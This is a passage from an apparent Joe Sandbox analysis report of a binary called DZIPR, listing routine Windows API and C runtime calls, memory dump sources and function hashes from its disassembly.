                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                        • String ID:
                                        • API String ID: 356813703-0
                                        • Opcode ID: 4c7a056a688ee80b133acd18a0e631adbefa3eac5db3c01d7c5175a2dda703cc
                                        • Instruction ID: 41e708d0082c2257f20b30ef919efa078d5789becd68986080f645a41b898732
                                        • Opcode Fuzzy Hash: 4c7a056a688ee80b133acd18a0e631adbefa3eac5db3c01d7c5175a2dda703cc
                                        • Instruction Fuzzy Hash: D6118E70500605AFEB10AF64CC89C2ABFB5FF42324B20C52EE65596660DB31AD65CF90
                                        APIs
                                        • __getptd.LIBCMT ref: 6FE3FE1A
                                          • Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
                                          • Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F
                                        • __amsg_exit.LIBCMT ref: 6FE3FE3A
                                        • __lock.LIBCMT ref: 6FE3FE4A
                                        • InterlockedDecrement.KERNEL32(?), ref: 6FE3FE67
                                        • InterlockedIncrement.KERNEL32(00D828E8), ref: 6FE3FE92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                        • String ID: $o
                                        • API String ID: 4271482742-1314351406
                                        • Opcode ID: 524d4f106e0240d39e50ce66b38f8351d50b9dc8479c5fc95ef767cc82560f87
                                        • Instruction ID: 2409da49df9916ab6e56581144cf4dfa72a6dbfc2019cca9af6e50781ff3b21b
                                        • Opcode Fuzzy Hash: 524d4f106e0240d39e50ce66b38f8351d50b9dc8479c5fc95ef767cc82560f87
                                        • Instruction Fuzzy Hash: C1015E33D01B719BDB19ABA6880875E7FA0AF86B39F21010ED41067391C739A991CBD5
                                        APIs
                                        • SetErrorMode.KERNEL32(00000000), ref: 6FE2CA85
                                        • SetErrorMode.KERNEL32(00000000), ref: 6FE2CA8D
                                          • Part of subcall function 6FE2A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FE2A6D0
                                          • Part of subcall function 6FE2A698: SetLastError.KERNEL32(0000006F), ref: 6FE2A6E7
                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FE2CADC
                                        • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FE2CAEC
                                          • Part of subcall function 6FE2C8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FE2C91F
                                          • Part of subcall function 6FE2C8E2: PathFindExtensionW.SHLWAPI(?), ref: 6FE2C939
                                          • Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2C983
                                          • Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2C9C2
                                          • Part of subcall function 6FE2C8E2: __wcsdup.LIBCMT ref: 6FE2CA14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
                                        • String ID: NotifyWinEvent$user32.dll
                                        • API String ID: 3531328582-597752486
                                        • Opcode ID: 87a7e292225ec6c9ca20ba03bc5de54c4be1d21ef61276d2af9535b33f5377f6
                                        • Instruction ID: b79003b13b83f46ece1791ce7b137252663710221a5478d75ec38ba69c61e95d
                                        • Opcode Fuzzy Hash: 87a7e292225ec6c9ca20ba03bc5de54c4be1d21ef61276d2af9535b33f5377f6
                                        • Instruction Fuzzy Hash: 4C01BC706542044FCB14EF68D804A4A3FE8AF45724F21805FB945DB381EB30E841CFA2
                                        APIs
                                        • GetSysColor.USER32(0000000F), ref: 6FE2CD2E
                                        • GetSysColor.USER32(00000010), ref: 6FE2CD35
                                        • GetSysColor.USER32(00000014), ref: 6FE2CD3C
                                        • GetSysColor.USER32(00000012), ref: 6FE2CD43
                                        • GetSysColor.USER32(00000006), ref: 6FE2CD4A
                                        • GetSysColorBrush.USER32(0000000F), ref: 6FE2CD57
                                        • GetSysColorBrush.USER32(00000006), ref: 6FE2CD5E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Color$Brush
                                        • String ID:
                                        • API String ID: 2798902688-0
                                        • Opcode ID: 0bb30676f329f156152756d8bbcd7805bd2c318747b0496f59fe8bd86a91869a
                                        • Instruction ID: 53dc158d02ae4717af5d50f84b564a25ea61bbfaf3788d3e92c40c9b044b0dcd
                                        • Opcode Fuzzy Hash: 0bb30676f329f156152756d8bbcd7805bd2c318747b0496f59fe8bd86a91869a
                                        • Instruction Fuzzy Hash: DAF0FE719407445BDB30BB724909B47BED1FFC5B20F16092EE2858B990D6B6E441DF40
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 6FE2818D
                                        • GetParent.USER32(?), ref: 6FE2819B
                                        • GetParent.USER32(?), ref: 6FE281AE
                                        • GetLastActivePopup.USER32(?), ref: 6FE281BF
                                        • IsWindowEnabled.USER32(?), ref: 6FE281D3
                                        • EnableWindow.USER32(?,00000000), ref: 6FE281E6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                        • String ID:
                                        • API String ID: 670545878-0
                                        • Opcode ID: cb21a1c2fb3783379ec47f4122c53add17bf2731661fc6694d1f65c470abd49d
                                        • Instruction ID: 6a0f09279c6bb77495b147a421c29d23d7ac44e77cdfe937a3c0af6582dfe57a
                                        • Opcode Fuzzy Hash: cb21a1c2fb3783379ec47f4122c53add17bf2731661fc6694d1f65c470abd49d
                                        • Instruction Fuzzy Hash: 7811A73260DA356BE71117698D40B5A7FE86F46B68F250257ED14EB3C0F760EB02C6D1
                                        APIs
                                        • __CreateFrameInfo.LIBCMT ref: 6FE3C43E
                                          • Part of subcall function 6FE34FC4: __getptd.LIBCMT ref: 6FE34FD2
                                          • Part of subcall function 6FE34FC4: __getptd.LIBCMT ref: 6FE34FE0
                                        • __getptd.LIBCMT ref: 6FE3C448
                                          • Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
                                          • Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F
                                        • __getptd.LIBCMT ref: 6FE3C456
                                        • __getptd.LIBCMT ref: 6FE3C464
                                        • __getptd.LIBCMT ref: 6FE3C46F
                                        • _CallCatchBlock2.LIBCMT ref: 6FE3C495
                                          • Part of subcall function 6FE35069: __CallSettingFrame@12.LIBCMT ref: 6FE350B5
                                          • Part of subcall function 6FE3C53C: __getptd.LIBCMT ref: 6FE3C54B
                                          • Part of subcall function 6FE3C53C: __getptd.LIBCMT ref: 6FE3C559
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                        • String ID:
                                        • API String ID: 1602911419-0
                                        • Opcode ID: 214f10ebbb662a94d3f06e9a9affa84bf66a9fcef99dbac364dd7db0ce494acb
                                        • Instruction ID: a78e4cb23ada3ae2071c82371f5b7a24afd180aa57bd9696fcc15e1961d0046e
                                        • Opcode Fuzzy Hash: 214f10ebbb662a94d3f06e9a9affa84bf66a9fcef99dbac364dd7db0ce494acb
                                        • Instruction Fuzzy Hash: D311F672D00319EFDF00DFA4C448AADBBB1FF04314F208169E814A7291EB3A9A51DF50
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 6FE2DB6D
                                        • GetDlgCtrlID.USER32(00000000), ref: 6FE2DB81
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 6FE2DB91
                                        • GetWindowRect.USER32(00000000,?), ref: 6FE2DBA3
                                        • PtInRect.USER32(?,?,?), ref: 6FE2DBB3
                                        • GetWindow.USER32(?,00000005), ref: 6FE2DBC0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                        • String ID:
                                        • API String ID: 1315500227-0
                                        • Opcode ID: 8619fbb88417f82934e91094e47f08fe8b8823a6010b3017bd1b647afa482459
                                        • Instruction ID: 8969288237acae66efaa27d1342c615c921bf3a34650007bebbc26a9ca6db324
                                        • Opcode Fuzzy Hash: 8619fbb88417f82934e91094e47f08fe8b8823a6010b3017bd1b647afa482459
                                        • Instruction Fuzzy Hash: 22018F3A104419ABCF216F558C18E9E3FA9EF43764F144125FA11D6180E734E62A8BD4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                        • API String ID: 2102423945-1093365818
                                        • Opcode ID: b22baa11d1baaddb11bcd483f8a43cd921fe9c570d4a0d5d42863ef5b9bb4401
                                        • Instruction ID: d80e53dc610d74652193aebbd70cfac1d80ff2712bddf50a9cb853cffbd7a9bb
                                        • Opcode Fuzzy Hash: b22baa11d1baaddb11bcd483f8a43cd921fe9c570d4a0d5d42863ef5b9bb4401
                                        • Instruction Fuzzy Hash: 2F910373D0032DAEDB41CF94C589BDEBFF8AF54348F20816AE958E6284E7749644C7A1
                                        APIs
                                        • GetMenuCheckMarkDimensions.USER32 ref: 6FE296F2
                                        • _memset.LIBCMT ref: 6FE2976A
                                        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FE297CD
                                        • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FE297E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                        • String ID:
                                        • API String ID: 4271682439-3916222277
                                        • Opcode ID: f5ceaa8257ac40727118d018aa1bbd39cdc9a8badd21a573b84328a16fd0014b
                                        • Instruction ID: 3a2c3df427f564e42f1617bc1eb7a6c543b071e9dee7c0471790753ab3dad039
                                        • Opcode Fuzzy Hash: f5ceaa8257ac40727118d018aa1bbd39cdc9a8badd21a573b84328a16fd0014b
                                        • Instruction Fuzzy Hash: 90312472A002259BEF108F688CC4B9D7FB5FB45354F6440AAE549DB2C0EB31AA899B50
                                        APIs
                                          • Part of subcall function 6FE2C220: EnterCriticalSection.KERNEL32(6FE534A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C25A
                                          • Part of subcall function 6FE2C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C26C
                                          • Part of subcall function 6FE2C220: LeaveCriticalSection.KERNEL32(6FE534A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C279
                                          • Part of subcall function 6FE2C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C289
                                          • Part of subcall function 6FE2BB0C: __EH_prolog3_catch.LIBCMT ref: 6FE2BB13
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FE31458
                                        • FreeLibrary.KERNEL32(?), ref: 6FE31468
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                        • String ID: (Qo$HtmlHelpW$hhctrl.ocx
                                        • API String ID: 2853499158-3778432635
                                        • Opcode ID: 0983bcba473a7f4146a105b0af2b5681e0b0204173bb40a1b9910624c78b6779
                                        • Instruction ID: c6c651039ae4586bbcab734c18f26a278622b2c5c0fe2bd00056bb5276b1aab9
                                        • Opcode Fuzzy Hash: 0983bcba473a7f4146a105b0af2b5681e0b0204173bb40a1b9910624c78b6779
                                        • Instruction Fuzzy Hash: FF01A232D04B26A7CB115FA5DD08B4A3FE0AF05369F20C91DF59A95290DB75E420DB51
                                        APIs
                                        • __getptd.LIBCMT ref: 6FE3C17F
                                          • Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
                                          • Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F
                                        • __getptd.LIBCMT ref: 6FE3C190
                                        • __getptd.LIBCMT ref: 6FE3C19E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$csm
                                        • API String ID: 803148776-1389381023
                                        • Opcode ID: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                                        • Instruction ID: 1e567c53ec422f74caa7e61e089d25f3b1fea91c5d4900ca5e9ebfdfaff0f7e4
                                        • Opcode Fuzzy Hash: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                                        • Instruction Fuzzy Hash: DDE0123BA542648FDB009678C0497583AE4AB95718F750196D418CB352D726E590EA42
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,6FE249D6,?,00000003), ref: 6FE25685
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FE256B4
                                        • GetLastError.KERNEL32 ref: 6FE256C5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FE256E5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FE25709
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                        • String ID:
                                        • API String ID: 3322701435-0
                                        • Opcode ID: 918722e846abf0333703a6ff3306fbe9c949ab61d0862ee4b170dd014ec65f5a
                                        • Instruction ID: 8706b7739b33c2fbe86b69bde48ba8c0d6f2c92e84740e9ce2101040896bad49
                                        • Opcode Fuzzy Hash: 918722e846abf0333703a6ff3306fbe9c949ab61d0862ee4b170dd014ec65f5a
                                        • Instruction Fuzzy Hash: 4F117F75384705ABE620AE68DDC5F677BECEB85754F20092DF681972C0E6A0BC098664
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?), ref: 6FE2DA3D
                                        • _memset.LIBCMT ref: 6FE2DA5B
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FE2DA75
                                        • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FE2DA87
                                        • SetWindowTextW.USER32(00000000,?), ref: 6FE2DA93
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                        • String ID:
                                        • API String ID: 4273134663-0
                                        • Opcode ID: 1ce7dad60e412e6efbc3dd1ee285fc734308fd9ac0b9d59b644046027df3a81a
                                        • Instruction ID: 67e4873c250c1f595b17f98bc5861b69d535dad287217d9af4c5e65da92ffedf
                                        • Opcode Fuzzy Hash: 1ce7dad60e412e6efbc3dd1ee285fc734308fd9ac0b9d59b644046027df3a81a
                                        • Instruction Fuzzy Hash: FD0184FA90571967CB10EF648C88DDF7BEDEF46354F10446AEA15D3241EA34EA1887A0
                                        APIs
                                        • TlsFree.KERNEL32(?,?,?,6FE2C179), ref: 6FE2C13B
                                        • GlobalHandle.KERNEL32(?), ref: 6FE2C149
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6FE2C152
                                        • GlobalFree.KERNEL32(00000000), ref: 6FE2C159
                                        • DeleteCriticalSection.KERNEL32(?,?,?,6FE2C179), ref: 6FE2C163
                                          • Part of subcall function 6FE2BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FE2BFBC
                                          • Part of subcall function 6FE2BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FE2BFCC
                                          • Part of subcall function 6FE2BF5D: LocalFree.KERNEL32(?), ref: 6FE2BFD5
                                          • Part of subcall function 6FE2BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FE2BFE7
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                        • String ID:
                                        • API String ID: 1549993015-0
                                        • Opcode ID: 4ecf531a3e9c94343b7fbf4e2e6bf09df1cef6f3a27e675ffbfdf1b9e553c1a6
                                        • Instruction ID: 20cb25175316705a7009220f1d2d1cb57875a5f276f03729e5a9427ea99ab545
                                        • Opcode Fuzzy Hash: 4ecf531a3e9c94343b7fbf4e2e6bf09df1cef6f3a27e675ffbfdf1b9e553c1a6
                                        • Instruction Fuzzy Hash: AFF03036704A109BDA106B3C9C48E5A3FF9AFC6674B25061EF565D7340DB30E9178BA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __calloc_crt
                                        • String ID: $o$ }o
                                        • API String ID: 3494438863-763987776
                                        • Opcode ID: 45c527bf59c732ed806cc9d52e6ac328cc2c7283a2575d5b8d91142c8cb301f8
                                        • Instruction ID: 9297f9e70e227851a4177e394bde870459dc0cb162b5e1aa20b300b3f5f06b35
                                        • Opcode Fuzzy Hash: 45c527bf59c732ed806cc9d52e6ac328cc2c7283a2575d5b8d91142c8cb301f8
                                        • Instruction Fuzzy Hash: 9D11C433B586655AEB0CC92DAC446613FE5AF87738B35422AE115CE380E739D8A18244
                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 6FE3C7D6
                                          • Part of subcall function 6FE3C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FE3C767
                                        • _UnwindNestedFrames.LIBCMT ref: 6FE3C7ED
                                        • ___FrameUnwindToState.LIBCMT ref: 6FE3C7FB
                                        Strings
                                        Memory Dump Source
